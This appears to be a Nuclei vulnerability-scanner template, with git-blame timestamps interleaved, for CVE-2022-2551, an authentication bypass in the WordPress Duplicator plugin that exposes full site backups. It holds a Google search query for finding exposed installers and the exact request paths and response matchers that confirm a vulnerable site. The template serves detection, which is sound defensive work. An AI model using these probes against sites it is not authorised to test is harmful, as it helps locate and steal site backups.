2022-09-03 19:19:55 +00:00
id : CVE-2022-2551
info :
2023-04-07 16:16:58 +00:00
name : WordPress Duplicator <1.4.7 - Authentication Bypass
2022-09-26 17:19:56 +00:00
author : LRTK-CODER
2022-09-03 19:19:55 +00:00
severity : high
description : |
2023-04-07 16:16:58 +00:00
WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site.
2023-09-06 11:59:08 +00:00
remediation : Fixed in version 1.4.7.1.
2022-09-03 19:19:55 +00:00
reference :
2022-09-26 17:19:56 +00:00
- https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0
- https://wordpress.org/plugins/duplicator/
2022-09-03 19:19:55 +00:00
- https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551
2023-04-07 16:16:58 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2551
2022-09-03 19:19:55 +00:00
classification :
2022-09-28 08:29:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-09-03 19:19:55 +00:00
cve-id : CVE-2022-2551
2022-09-28 08:29:07 +00:00
cwe-id : CWE-425
2023-10-14 11:27:55 +00:00
epss-score : 0.79836
2024-01-14 13:49:27 +00:00
epss-percentile : 0.98016
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
2022-09-26 17:25:43 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : snapcreek
product : duplicator
2023-09-06 11:59:08 +00:00
framework : wordpress
google-query : inurl:/backups-dup-lite/dup-installer/
2024-01-14 09:21:50 +00:00
tags : cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek
2022-09-26 17:24:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-03 19:19:55 +00:00
- method : GET
path :
2022-09-26 17:19:56 +00:00
- "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1"
- "{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"
2022-09-26 17:27:53 +00:00
2022-09-03 19:19:55 +00:00
matchers-condition : and
matchers :
2023-07-11 19:49:27 +00:00
- type : word
2022-09-03 19:19:55 +00:00
part : body
words :
- "<a href='../installer.php'>restart this install process</a>"
2023-07-11 19:49:27 +00:00
condition : and
2022-09-26 17:19:56 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502205ff9814bd831f4979417409139fd5adddf194fb82ba992abe569dd34eb976041022100dd9b088c79e80303cb08bc9b6d1c189b3c6d17c09567204194dc150c6b8a0574:922c64590222798bb761d5b6d8e72950